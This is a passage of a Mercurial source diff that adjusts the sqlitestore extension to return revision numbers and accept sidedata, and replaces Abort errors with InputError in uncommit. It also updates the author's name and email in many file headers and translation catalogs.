def __init__(self, db, path, compression):
+ self.nullid = sha1nodeconstants.nullid
self._db = db
self._path = path
@@ -586,6 +589,7 @@
revisiondata=False,
assumehaveparentrevisions=False,
deltamode=repository.CG_DELTAMODE_STD,
+ sidedata_helpers=None,
):
if nodesorder not in (b'nodes', b'storage', b'linear', None):
raise error.ProgrammingError(
@@ -624,6 +628,7 @@
revisiondata=revisiondata,
assumehaveparentrevisions=assumehaveparentrevisions,
deltamode=deltamode,
+ sidedata_helpers=sidedata_helpers,
):
yield delta
@@ -636,7 +641,8 @@
if meta or filedata.startswith(b'\x01\n'):
filedata = storageutil.packmeta(meta, filedata)
- return self.addrevision(filedata, transaction, linkrev, p1, p2)
+ rev = self.addrevision(filedata, transaction, linkrev, p1, p2)
+ return self.node(rev)
def addrevision(
self,
@@ -658,15 +664,16 @@
if validatehash:
self._checkhash(revisiondata, node, p1, p2)
- if node in self._nodetorev:
- return node
+ rev = self._nodetorev.get(node)
+ if rev is not None:
+ return rev
- node = self._addrawrevision(
+ rev = self._addrawrevision(
node, revisiondata, transaction, linkrev, p1, p2
)
self._revisioncache[node] = revisiondata
- return node
+ return rev
def addgroup(
self,
@@ -679,7 +686,16 @@
):
empty = True
- for node, p1, p2, linknode, deltabase, delta, wireflags in deltas:
+ for (
+ node,
+ p1,
+ p2,
+ linknode,
+ deltabase,
+ delta,
+ wireflags,
+ sidedata,
+ ) in deltas:
storeflags = 0
if wireflags & repository.REVISION_FLAG_CENSORED:
@@ -741,7 +757,7 @@
)
if duplicaterevisioncb:
- duplicaterevisioncb(self, node)
+ duplicaterevisioncb(self, self.rev(node))
empty = False
continue
@@ -752,7 +768,7 @@
text = None
storedelta = (deltabase, delta)
- self._addrawrevision(
+ rev = self._addrawrevision(
node,
text,
transaction,
@@ -764,7 +780,7 @@
)
if addrevisioncb:
- addrevisioncb(self, node)
+ addrevisioncb(self, rev)
empty = False
return not empty
@@ -897,6 +913,10 @@
def files(self):
return []
+ def sidedata(self, nodeorrev, _df=None):
+ # Not supported for now
+ return {}
+
def storageinfo(
self,
exclusivefiles=False,
@@ -1079,7 +1099,7 @@
self._revtonode[rev] = node
self._revisions[node] = entry
- return node
+ return rev
class sqliterepository(localrepo.localrepository):
--- a/hgext/transplant.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/transplant.py Tue Apr 20 11:01:06 2021 -0400
@@ -47,6 +47,7 @@
from mercurial.utils import (
procutil,
stringutil,
+ urlutil,
)
@@ -818,7 +819,8 @@
sourcerepo = opts.get(b'source')
if sourcerepo:
- peer = hg.peer(repo, opts, ui.expandpath(sourcerepo))
+ u = urlutil.get_unique_pull_path(b'transplant', repo, ui, sourcerepo)[0]
+ peer = hg.peer(repo, opts, u)
heads = pycompat.maplist(peer.lookup, opts.get(b'branch', ()))
target = set(heads)
for r in revs:
--- a/hgext/uncommit.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/uncommit.py Tue Apr 20 11:01:06 2021 -0400
@@ -175,7 +175,7 @@
old = repo[b'.']
rewriteutil.precheck(repo, [old.rev()], b'uncommit')
if len(old.parents()) > 1:
- raise error.Abort(_(b"cannot uncommit merge changeset"))
+ raise error.InputError(_(b"cannot uncommit merge changeset"))
match = scmutil.match(old, pats, opts)
@@ -202,7 +202,7 @@
else:
hint = _(b"file does not exist")
- raise error.Abort(
+ raise error.InputError(
_(b'cannot uncommit "%s"') % scmutil.getuipathfn(repo)(f),
hint=hint,
)
@@ -280,7 +280,7 @@
markers = list(predecessormarkers(curctx))
if len(markers) != 1:
e = _(b"changeset must have one predecessor, found %i predecessors")
- raise error.Abort(e % len(markers))
+ raise error.InputError(e % len(markers))
prednode = markers[0].prednode()
predctx = unfi[prednode]
--- a/hgext/win32text.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/win32text.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# win32text.py - LF <-> CRLF/CR translation utilities for Windows/Mac users
#
-# Copyright 2005, 2007-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005, 2007-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/zeroconf/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/zeroconf/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# zeroconf.py - zeroconf support for Mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/i18n/da.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/da.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# Danish translations for Mercurial
# Danske oversættelser for Mercurial
-# Copyright (C) 2009, 2010 Matt Mackall and others
+# Copyright (C) 2009, 2010 Olivia Mackall and others
#
# Translation dictionary:
#
@@ -11359,11 +11359,11 @@
msgstr "(se http://mercurial.selenic.com for mere information)"
msgid ""
-"Copyright (C) 2005-2011 Matt Mackall and others\n"
+"Copyright (C) 2005-2011 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2011 Matt Mackall og andre\n"
+"Copyright (C) 2005-2011 Olivia Mackall og andre\n"
"Dette er frit programmel; se kildekoden for kopieringsbetingelser. Der\n"
"gives INGEN GARANTI; ikke engang for SALGBARHED eller EGNETHED FOR\n"
"NOGET BESTEMT FORMÅL.\n"
--- a/i18n/de.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/de.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# German translations for Mercurial
# Deutsche Übersetzungen für Mercurial
-# Copyright (C) 2009 Matt Mackall and others
+# Copyright (C) 2009 Olivia Mackall and others
#
# Übersetzer:
# Tobias Bell
@@ -14536,11 +14536,11 @@
msgstr "(siehe http://mercurial.selenic.com für mehr Information)"
msgid ""
-"Copyright (C) 2005-2014 Matt Mackall and others\n"
+"Copyright (C) 2005-2014 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2014 Matt Mackall und andere\n"
+"Copyright (C) 2005-2014 Olivia Mackall und andere\n"
"Dies ist freie Software; siehe Quellen für Kopierbestimmungen. Es besteht\n"
"KEINE Gewährleistung für das Programm, nicht einmal der Marktreife oder der\n"
"Verwendbarkeit für einen bestimmten Zweck.\n"
@@ -18893,7 +18893,7 @@
msgstr ""
msgid ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
@@ -19032,7 +19032,7 @@
msgid ""
"Author\n"
"\"\"\"\"\"\"\n"
-"Written by Matt Mackall <mpm@selenic.com>"
+"Written by Olivia Mackall <olivia@selenic.com>"
msgstr ""
msgid ""
@@ -19050,7 +19050,7 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2014 Matt Mackall.\n"
+"Copyright (C) 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
@@ -19088,7 +19088,7 @@
"Vadim Gelfer <vadim.gelfer@gmail.com>"
msgstr ""
-msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>."
+msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>."
msgstr ""
msgid ""
@@ -19101,7 +19101,7 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2006 Vadim Gelfer.\n"
-"Mercurial is copyright 2005-2014 Matt Mackall.\n"
+"Mercurial is copyright 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
@@ -19307,7 +19307,7 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2005 Bryan O'Sullivan.\n"
-"Mercurial is copyright 2005-2014 Matt Mackall.\n"
+"Mercurial is copyright 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
--- a/i18n/el.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/el.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# Greek translations for Mercurial
# Ελληνική μετάφραση των μηνυμάτων του Mercurial
#
-# Copyright (C) 2009 Matt Mackall και άλλοι
+# Copyright (C) 2009 Olivia Mackall και άλλοι
#
msgid ""
msgstr ""
@@ -7606,12 +7606,12 @@
msgid ""
"\n"
-"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n"
+"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
"\n"
-"Πνευματικά δικαιώματα (C) 2005-2009 Matt Mackall <mpm@selenic.com> και άλλοι\n"
+"Πνευματικά δικαιώματα (C) 2005-2009 Olivia Mackall <olivia@selenic.com> και άλλοι\n"
"Αυτό το πρόγραμμα είναι ελεύθερο λογισμικό· δείτε τον πηγαίο κώδικα για\n"
"την άδεια χρήσης του. Δεν παρέχεται ΚΑΜΙΑ εγγύηση· ούτε καν για την\n"
"ΕΜΠΟΡΕΥΣΙΜΟΤΗΤΑ ή την ΚΑΤΑΛΛΗΛΟΤΗΤΑ ΓΙΑ ΚΑΠΟΙΟ ΣΚΟΠΟ.\n"
--- a/i18n/fr.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/fr.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# French translations for Mercurial
# Traductions françaises de Mercurial
-# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others
#
# Quelques règles :
# - dans l'aide d'une commande, la première ligne descriptive
@@ -9412,7 +9412,7 @@
msgid ""
"\n"
-"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n"
+"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
--- a/i18n/hggettext Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/hggettext Tue Apr 20 11:01:06 2021 -0400
@@ -2,7 +2,7 @@
#
# hggettext - carefully extract docstrings for Mercurial
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/i18n/it.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/it.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# Italian translations for Mercurial
# Traduzione italiana per Mercurial
-# Copyright (C) 2009 Matt Mackall and others
+# Copyright (C) 2009 Olivia Mackall and others
msgid ""
msgstr ""
"Project-Id-Version: Mercurial\n"
@@ -8881,11 +8881,11 @@
msgstr ""
msgid ""
-"Copyright (C) 2005-2011 Matt Mackall and others\n"
+"Copyright (C) 2005-2011 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2011 Matt Mackall e altri\n"
+"Copyright (C) 2005-2011 Olivia Mackall e altri\n"
"Questo è software libero; vedere i sorgenti per le condizioni di copia.\n"
"Non c'è ALCUNA garanzia; neppure di COMMERCIABILITÀ o IDONEITÀ AD UNO\n"
"SCOPO PARTICOLARE.\n"
--- a/i18n/ja.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/ja.po Tue Apr 20 11:01:06 2021 -0400
@@ -18771,11 +18771,11 @@
msgstr "(詳細は https://mercurial-scm.org を参照)"
msgid ""
-"Copyright (C) 2005-2018 Matt Mackall and others\n"
+"Copyright (C) 2005-2018 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2018 Matt Mackall and others\n"
+"Copyright (C) 2005-2018 Olivia Mackall and others\n"
"本製品はフリーソフトウェアです。\n"
"頒布条件に関しては同梱されるライセンス条項をお読みください。\n"
"市場適合性や特定用途への可否を含め、 本製品は無保証です。\n"
@@ -30239,11 +30239,11 @@
msgid ""
"Author\n"
"\"\"\"\"\"\"\n"
-"Written by Matt Mackall <mpm@selenic.com>"
+"Written by Olivia Mackall <olivia@selenic.com>"
msgstr ""
"著者\n"
"\"\"\"\"\n"
-"Matt Mackall <mpm@selenic.com>"
+"Olivia Mackall <olivia@selenic.com>"
msgid ""
"Resources\n"
@@ -30264,13 +30264,13 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2016 Matt Mackall.\n"
+"Copyright (C) 2005-2016 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2016 Matt Mackall.\n"
+"Copyright (C) 2005-2016 Olivia Mackall.\n"
"本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n"
"Public License の元での自由な利用が保証されています。"
@@ -30293,12 +30293,12 @@
"----------------------------------"
msgid ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
msgstr ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
@@ -30471,13 +30471,13 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2018 Matt Mackall.\n"
+"Copyright (C) 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2016 Matt Mackall.\n"
+"Copyright (C) 2005-2016 Olivia Mackall.\n"
"本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n"
"Public License の元での自由な利用が保証されています。"
@@ -30519,8 +30519,8 @@
"====\n"
"本マニュアルページの著者は Vadim Gelfer <vadim.gelfer@gmail.com> です。"
-msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>."
-msgstr "Mercurial の著者は Matt Mackall <mpm@selenic.com> です。"
+msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>."
+msgstr "Mercurial の著者は Olivia Mackall <olivia@selenic.com> です。"
msgid ""
"See Also\n"
@@ -30536,14 +30536,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2006 Vadim Gelfer.\n"
-"Mercurial is copyright 2005-2018 Matt Mackall.\n"
+"Mercurial is copyright 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Copying\n"
"=======\n"
"本マニュアルページの著作権は copyright 2006 Vadim Gelfer です。\n"
-"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n"
+"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n"
"本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n"
"Public License の元での自由な利用が保証されています。"
@@ -30825,14 +30825,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2005 Bryan O'Sullivan.\n"
-"Mercurial is copyright 2005-2018 Matt Mackall.\n"
+"Mercurial is copyright 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Copying\n"
"=======\n"
"本マニュアルの著作権は copyright 2005 Bryan O'Sullivan です。\n"
-"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n"
+"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n"
"本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n"
"Public License の元での自由な利用が保証されています。"
@@ -39790,13 +39790,13 @@
#~ msgid ""
#~ "Copying\n"
#~ "\"\"\"\"\"\"\"\n"
-#~ "Copyright (C) 2005-2017 Matt Mackall.\n"
+#~ "Copyright (C) 2005-2017 Olivia Mackall.\n"
#~ "Free use of this software is granted under the terms of the GNU General\n"
#~ "Public License version 2 or any later version."
#~ msgstr ""
#~ "Copying\n"
#~ "\"\"\"\"\"\"\"\n"
-#~ "Copyright (C) 2005-2017 Matt Mackall.\n"
+#~ "Copyright (C) 2005-2017 Olivia Mackall.\n"
#~ "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n"
#~ "Public License の元での自由な利用が保証されています。"
--- a/i18n/pt_BR.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/pt_BR.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# Brazilian Portuguese translations for Mercurial
# Traduções do Mercurial para português do Brasil
-# Copyright (C) 2011 Matt Mackall and others
+# Copyright (C) 2011 Olivia Mackall and others
#
# Translators:
# Diego Oliveira <diego@diegooliveira.com>
@@ -19269,11 +19269,11 @@
msgstr "(veja https://mercurial-scm.org para mais informações)"
msgid ""
-"Copyright (C) 2005-2018 Matt Mackall and others\n"
+"Copyright (C) 2005-2018 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2018 Matt Mackall e outros\n"
+"Copyright (C) 2005-2018 Olivia Mackall e outros\n"
"Este software é livre; veja os fontes para condições de cópia. Não\n"
"há garantias, nem mesmo de adequação para qualquer propósito em\n"
"particular.\n"
@@ -31340,11 +31340,11 @@
msgid ""
"Author\n"
"\"\"\"\"\"\"\n"
-"Written by Matt Mackall <mpm@selenic.com>"
+"Written by Olivia Mackall <olivia@selenic.com>"
msgstr ""
"Autor\n"
"\"\"\"\"\"\n"
-"Escrito por Matt Mackall <mpm@selenic.com>"
+"Escrito por Olivia Mackall <olivia@selenic.com>"
msgid ""
"Resources\n"
@@ -31367,13 +31367,13 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2016 Matt Mackall.\n"
+"Copyright (C) 2005-2016 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Cópia\n"
"\"\"\"\"\"\n"
-"Copyright (C) 2005-2016 Matt Mackall.\n"
+"Copyright (C) 2005-2016 Olivia Mackall.\n"
"Garante-se livre uso deste software nos termos da licença\n"
"GNU General Public License, versão 2 ou qualquer versão posterior."
@@ -31396,12 +31396,12 @@
"----------------------------------------------------"
msgid ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
msgstr ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
@@ -31581,13 +31581,13 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2018 Matt Mackall.\n"
+"Copyright (C) 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Cópia\n"
"\"\"\"\"\"\n"
-"Copyright (C) 2005-2018 Matt Mackall.\n"
+"Copyright (C) 2005-2018 Olivia Mackall.\n"
"Garante-se livre uso deste software nos termos da licença\n"
"GNU General Public License, versão 2 ou qualquer versão posterior."
@@ -31629,8 +31629,8 @@
"=====\n"
"Vadim Gelfer <vadim.gelfer@gmail.com>"
-msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>."
-msgstr "Mercurial foi escrito por Matt Mackall <mpm@selenic.com>."
+msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>."
+msgstr "Mercurial foi escrito por Olivia Mackall <olivia@selenic.com>."
msgid ""
"See Also\n"
@@ -31645,14 +31645,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2006 Vadim Gelfer.\n"
-"Mercurial is copyright 2005-2018 Matt Mackall.\n"
+"Mercurial is copyright 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Cópia\n"
"=====\n"
"Esta página de manual: copyright 2006 Vadim Gelfer.\n"
-"Mercurial: copyright 2005-2018 Matt Mackall.\n"
+"Mercurial: copyright 2005-2018 Olivia Mackall.\n"
"Garante-se livre uso deste software nos termos da licença\n"
"GNU General Public License, versão 2 ou qualquer versão posterior."
@@ -31928,14 +31928,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2005 Bryan O'Sullivan.\n"
-"Mercurial is copyright 2005-2018 Matt Mackall.\n"
+"Mercurial is copyright 2005-2018 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Cópia\n"
"=====\n"
"Esta página de manual: copyright 2005 Bryan O'Sullivan.\n"
-"Mercurial: copyright 2005-2018 Matt Mackall.\n"
+"Mercurial: copyright 2005-2018 Olivia Mackall.\n"
"Garante-se livre uso deste software nos termos da licença\n"
"GNU General Public License, versão 2 ou qualquer versão posterior."
@@ -41308,13 +41308,13 @@
#~ msgid ""
#~ "Copying\n"
#~ "\"\"\"\"\"\"\"\n"
-#~ "Copyright (C) 2005-2017 Matt Mackall.\n"
+#~ "Copyright (C) 2005-2017 Olivia Mackall.\n"
#~ "Free use of this software is granted under the terms of the GNU General\n"
#~ "Public License version 2 or any later version."
#~ msgstr ""
#~ "Cópia\n"
#~ "\"\"\"\"\"\n"
-#~ "Copyright (C) 2005-2017 Matt Mackall.\n"
+#~ "Copyright (C) 2005-2017 Olivia Mackall.\n"
#~ "Garante-se livre uso deste software nos termos da licença\n"
#~ "GNU General Public License, versão 2 ou qualquer versão posterior."
--- a/i18n/ro.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/ro.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# Romanian translation for Mercurial
# Traducerea în limba română pentru Mercurial
#
-# Copyright (C) 2010 Matt Mackall <mpm@selenic.com> and others
+# Copyright (C) 2010 Olivia Mackall <olivia@selenic.com> and others
#
#
# Glosar de traduceri
@@ -10032,11 +10032,11 @@
msgstr "(vezi http://mercurial.selenic.com pentru mai multe informații)"
msgid ""
-"Copyright (C) 2005-2011 Matt Mackall and others\n"
+"Copyright (C) 2005-2011 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2011 Matt Mackall și alții\n"
+"Copyright (C) 2005-2011 Olivia Mackall și alții\n"
"Acesta este software liber; vezi sursa pentru condițiile de copiere.\n"
"Nu există NICIO garanție; nici măcar pentru COMERCIALIZARE sau\n"
"COMPATIBILITATE ÎN ANUMITE SCOPURI.\n"
--- a/i18n/ru.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/ru.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
# Russian translations for Mercurial package.
-# Copyright (C) 2011 Matt Mackall <mpm@selenic.com> and others
+# Copyright (C) 2011 Olivia Mackall <olivia@selenic.com> and others
# This file is distributed under the same license as the Mercurial package.
# === Glossary ===
#
@@ -15590,11 +15590,11 @@
msgstr "(подробнее см. http://mercurial.selenic.com)"
msgid ""
-"Copyright (C) 2005-2014 Matt Mackall and others\n"
+"Copyright (C) 2005-2014 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"(С) 2005-2014 Matt Mackall и другие.\n"
+"(С) 2005-2014 Olivia Mackall и другие.\n"
"Это свободное ПО; условия распространения см. в исходном коде.\n"
"НИКАКИХ ГАРАНТИЙ НЕ ПРЕДОСТАВЛЯЕТСЯ, в том числе на пригодность для\n"
"коммерческого использования и для решения конкретных задач.\n"
@@ -21807,7 +21807,7 @@
# NOT SURE should this be translated?
msgid ""
-":Author: Matt Mackall <mpm@selenic.com>\n"
+":Author: Olivia Mackall <olivia@selenic.com>\n"
":Organization: Mercurial\n"
":Manual section: 1\n"
":Manual group: Mercurial Manual"
@@ -22000,11 +22000,11 @@
msgid ""
"Author\n"
"\"\"\"\"\"\"\n"
-"Written by Matt Mackall <mpm@selenic.com>"
+"Written by Olivia Mackall <olivia@selenic.com>"
msgstr ""
"Автор\n"
"\"\"\"\"\"\n"
-"Matt Mackall <mpm@selenic.com>"
+"Olivia Mackall <olivia@selenic.com>"
msgid ""
"Resources\n"
@@ -22024,13 +22024,13 @@
msgid ""
"Copying\n"
"\"\"\"\"\"\"\"\n"
-"Copyright (C) 2005-2014 Matt Mackall.\n"
+"Copyright (C) 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Копирование\n"
"\"\"\"\"\"\"\"\"\"\"\"\n"
-"(C) 2005-2014 Matt Mackall.\n"
+"(C) 2005-2014 Olivia Mackall.\n"
"Свободное использование этого ПО возможно в соответствии с \n"
"Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше."
@@ -22068,8 +22068,8 @@
"=====\n"
"Vadim Gelfer <vadim.gelfer@gmail.com>"
-msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>."
-msgstr "Mercurial написан Matt Mackall <mpm@selenic.com>."
+msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>."
+msgstr "Mercurial написан Olivia Mackall <olivia@selenic.com>."
msgid ""
"See Also\n"
@@ -22084,14 +22084,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2006 Vadim Gelfer.\n"
-"Mercurial is copyright 2005-2014 Matt Mackall.\n"
+"Mercurial is copyright 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Копирование\n"
"===========\n"
"Правами на данную страницу обладает (с) 2006 Vadim Gelfer\n"
-"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n"
+"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n"
"Свободное использование этого ПО возможно в соответствии с \n"
"Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше."
@@ -22346,14 +22346,14 @@
"Copying\n"
"=======\n"
"This manual page is copyright 2005 Bryan O'Sullivan.\n"
-"Mercurial is copyright 2005-2014 Matt Mackall.\n"
+"Mercurial is copyright 2005-2014 Olivia Mackall.\n"
"Free use of this software is granted under the terms of the GNU General\n"
"Public License version 2 or any later version."
msgstr ""
"Копирование\n"
"===========\n"
"Правами на данную страницу обладает (с) 2005 Bryan O'Sullivan\n"
-"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n"
+"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n"
"Свободное использование этого ПО возможно в соответствии с \n"
"Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше."
--- a/i18n/sv.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/sv.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# Swedish translation for Mercurial
# Svensk översättning för Mercurial
-# Copyright (C) 2009-2012 Matt Mackall and others
+# Copyright (C) 2009-2012 Olivia Mackall and others
#
# Translation dictionary:
#
@@ -12413,11 +12413,11 @@
msgstr "(se http://mercurial.selenic.com för mer information)"
msgid ""
-"Copyright (C) 2005-2012 Matt Mackall and others\n"
+"Copyright (C) 2005-2012 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2012 Matt Mackall och andra\n"
+"Copyright (C) 2005-2012 Olivia Mackall och andra\n"
"Detta är fri mjukvara; se källkoden för kopieringsvillkor. Det ges INGEN\n"
"garanti; inte ens för SÄLJBARHET eller ATT PASSA FÖR ETT VISST ÄNDAMÅL.\n"
--- a/i18n/zh_CN.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/zh_CN.po Tue Apr 20 11:01:06 2021 -0400
@@ -7409,12 +7409,12 @@
msgid ""
"\n"
-"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n"
+"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
"\n"
-"版权所有 (C) 2005-2010 Matt Mackall <mpm@selenic.com> 和其他人。\n"
+"版权所有 (C) 2005-2010 Olivia Mackall <olivia@selenic.com> 和其他人。\n"
